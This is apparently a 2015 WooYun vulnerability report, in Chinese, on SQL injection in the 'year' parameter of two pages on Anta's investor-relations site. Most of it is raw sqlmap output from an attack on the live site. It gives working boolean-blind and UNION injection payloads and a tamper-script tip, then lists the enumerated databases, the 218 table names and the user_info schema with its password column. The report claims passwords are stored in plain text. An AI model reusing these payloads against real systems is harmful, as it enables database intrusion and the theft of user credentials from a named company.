2015-06-16: 细节已通知厂商并且等待厂商处理中 2015-06-21: 厂商已经主动忽略漏洞,细节向公众公开
RT
SQL注入涉及大量数据库某表中用户密码明文存储居然两处sql注入:注入点1:
http://ir.anta.com/sc/home.php?id=4&Itemid=3&option=3&year=*
参数year存在注入注入点2:
http://ir.anta.com/tc/home.php?id=4&Itemid=3&option=3&year=*
WooYun: 安踏SQL注入漏洞可影响多个站点
这个注入点,厂商已经确认一年多了,竟然还未修复???是忘了吗?sqlmap跑的时候注意下需要加参数--tamper=space2morehash.py
sqlmap identified the following injection points with a total of 331 HTTP(s) requests:---Parameter: #1* (URI) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: http://ir.anta.com:80/sc/home.php?id=4&Itemid=3&option=3&year=' RLIKE (SELECT (CASE WHEN (8257=8257) THEN '' ELSE 0x28 END)) AND 'gKeW'='gKeW Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END)) Type: UNION query Title: Generic UNION query (NULL) - 22 columns Payload: http://ir.anta.com:80/sc/home.php?id=4&Itemid=3&option=3&year=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766b7171,0x447347527547427a4565,0x7162717071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Vector: UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ---sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* (URI) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: http://ir.anta.com:80/sc/home.php?id=4&Itemid=3&option=3&year=' RLIKE (SELECT (CASE WHEN (8257=8257) THEN '' ELSE 0x28 END)) AND 'gKeW'='gKeW Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END)) Type: UNION query Title: Generic UNION query (NULL) - 22 columns Payload: http://ir.anta.com:80/sc/home.php?id=4&Itemid=3&option=3&year=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766b7171,0x447347527547427a4565,0x7162717071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Vector: UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ---web server operating system: Linux CentOS 5.10web application technology: Apache 2.2.3, PHP 5.4.40back-end DBMS: MySQL >= 5.0.0current user: 'tomocms2@%'current database: 'tomocms2'current user is DBA: Trueavailable databases [54]:[*] aastocks_db[*] bboard[*] bboard2[*] bboard2_20101231[*] chinastarch1[*] cks[*] cks_new[*] community[*] community_20101231[*] doubleindex[*] ginsengnatural[*] glkg[*] hds[*] hds_2009[*] information_schema[*] jiuhao[*] kotocms003[*] kotoportal003[*] l_xingyecopper[*] maryhelp[*] maryhelp_20140709[*] mh[*] midea[*] mysql[*] mysql_old[*] new-ray[*] newworld[*] newworld_20131210[*] newworld_demo[*] ntop[*] onlinereport[*] performance_schema[*] report[*] samkadm_cms[*] smart_xtep[*] smart_xtep_20100106[*] snowkiss[*] tdn[*] test[*] tomocms[*] tomocms2[*] tomocms2_center[*] tomocms2_cn[*] tomocms2_export[*] tomocms2_my[*] tomocms2_restore[*] tomocms2_sg[*] tomocms2_temp[*] tomocms2_tw[*] tomocms2copy[*] view_db[*] web2project[*] wordpress[*] xinhuapinmeisqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* (URI) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: http://ir.anta.com:80/sc/home.php?id=4&Itemid=3&option=3&year=' RLIKE (SELECT (CASE WHEN (8257=8257) THEN '' ELSE 0x28 END)) AND 'gKeW'='gKeW Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END)) Type: UNION query Title: Generic UNION query (NULL) - 22 columns Payload: http://ir.anta.com:80/sc/home.php?id=4&Itemid=3&option=3&year=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766b7171,0x447347527547427a4565,0x7162717071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Vector: UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ---web server operating system: Linux CentOS 5.10web application technology: Apache 2.2.3, PHP 5.4.40back-end DBMS: MySQL >= 5.0.0Database: tomocms2[218 tables]+-----------------------------------+| language || showcases_record_history.20140823 || tomocms2_center.cms_content_press || alert_form || client_index || client_info || client_infoen || client_infosc || client_infotc || cms_alert || cms_content || cms_content_115 || cms_content_3 || cms_content_312 || cms_content_313 || cms_content_314 || cms_content_38 || cms_content_3_38 || cms_content_3_4_38 || cms_content_4 || cms_content_5 || cms_content_7 || cms_content_76 || cms_content_7_76 || cms_content_delete || cms_content_highlight || cms_content_jrj || cms_content_scio || cms_header || cms_header_client || cms_index || cms_index_client || cms_info || cms_info_client || cmsgroup_info || cmsgroup_info_client || company_details_1_en || company_details_1_tc || company_details_2_en || company_details_2_tc || email_alert || email_template || enquiry_form || exchange_code || feedback_app || fileview || ftp_accounts || ftp_accounts_20140207 || function1 || function10 || function10_css || function10_list || function10_list_default || function11 || function12 || function13 || function13_area06 || function14 || function15 || function16 || function2 || function3 || function4 || function5 || function6 || function7 || function8 || function9 || hkex_alert_counter || hkex_alert_headline || hkex_alert_queue || hkex_alert_record || hkex_alert_record_new || hkex_alert_record_new_problem || hkex_alert_record_problem || hkex_alert_record_testing || hkex_scan || httpd_accounts || industry_code || item || mod03_records || mod03_records_app || mod1 || mod10_info || mod11_info || mod11_info_backup || mod12_info || mod12_info_backup || mod14_info || mod15_caption_info || mod15_caption_info_backup || mod15_info_0 || mod15_info_0_20131120 || mod15_info_0_backup || mod15_info_1 || mod15_info_1_backup || mod15_info_2 || mod15_info_2_backup || mod15_label_info || mod15_label_info_backup || mod15_ppt_info || mod15_ppt_info_backup || mod17_info || mod18_history || mod18_info_old || mod18_schedule_old || mod18_smallchart || mod18_temp || mod19_info || mod1_csv_record || mod1_email_record || mod1_info || mod21_content || mod21_csv_record || mod21_email_record || mod21_info || mod22_content || mod22_content_backup || mod22_csv_record || mod22_email_record || mod22_info || mod23_email || mod23_info || mod23_live || mod23_log || mod23_pass || mod23_qa || mod23_record || mod23_reminder || mod24_color || mod24_info || mod25_content || mod25_info || mod26_content || mod26_info || mod28_color || mod28_info || mod28_pm || mod29_info || mod2_info || mod30_color || mod30_info || mod31_info || mod32_info || mod32_pm || mod33_setting || mod6_holiday || mod6_info || mod8_info || mod9_delete || mod9_field || mod9_info || mod9_info_20130128 || mod9_info_20130311 || mod9_info_20130428 || mod9_info_backup || mod9_info_category || mod9_info_client || mod9_info_country || mod9_info_country_change || mod9_info_email || mod9_info_migrate || mod9_info_new || mod9_info_new_20140227 || mod9_info_new_20140228 || mod9_info_new_toni || mod9_info_press8 || mod9_info_press9 || mod9_info_problem || mod9_info_setting || mod9_info_title || mod9_info_title_change || mod9_setting || mod_index || modright_info || news01 || news02 || news_final || news_records || news_source || pageview || pageview2 || pageview2_last || pageview3 || pageview3_last || pageview4 || pageview4_session || pageview_last || photo_log || photo_login || promotion_content || promotion_index || request_content || request_content_complete || request_content_new || request_email || request_header || request_index || request_status || resize_pic || showcases_record || showcases_record_history || smic_contact_form || survey_content || survey_header || todayir_industry_code || type_code || type_code_china || user_index || user_info || user_log || userright_info || video_auth || video_chat || video_log || voting_result || voting_result_new || wpip |+-----------------------------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* (URI) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: http://ir.anta.com:80/sc/home.php?id=4&Itemid=3&option=3&year=' RLIKE (SELECT (CASE WHEN (8257=8257) THEN '' ELSE 0x28 END)) AND 'gKeW'='gKeW Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END)) Type: UNION query Title: Generic UNION query (NULL) - 22 columns Payload: http://ir.anta.com:80/sc/home.php?id=4&Itemid=3&option=3&year=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766b7171,0x447347527547427a4565,0x7162717071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Vector: UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ---web server operating system: Linux CentOS 5.10web application technology: Apache 2.2.3, PHP 5.4.40back-end DBMS: MySQL >= 5.0.0Database: tomocms2Table: user_info[9 columns]+----------+--------------+| Column | Type |+----------+--------------+| admin | varchar(1) || clientid | int(5) || email | varchar(100) || item | int(3) || lang | varchar(2) || login | varchar(40) || password | varchar(32) || status | varchar(1) || userid | int(5) |+----------+--------------+
密码明文存储,大量弱口令密码
参数过滤
危害等级:无影响厂商忽略
忽略时间:2015-06-21 16:54
漏洞Rank:4 (WooYun评价)
暂无
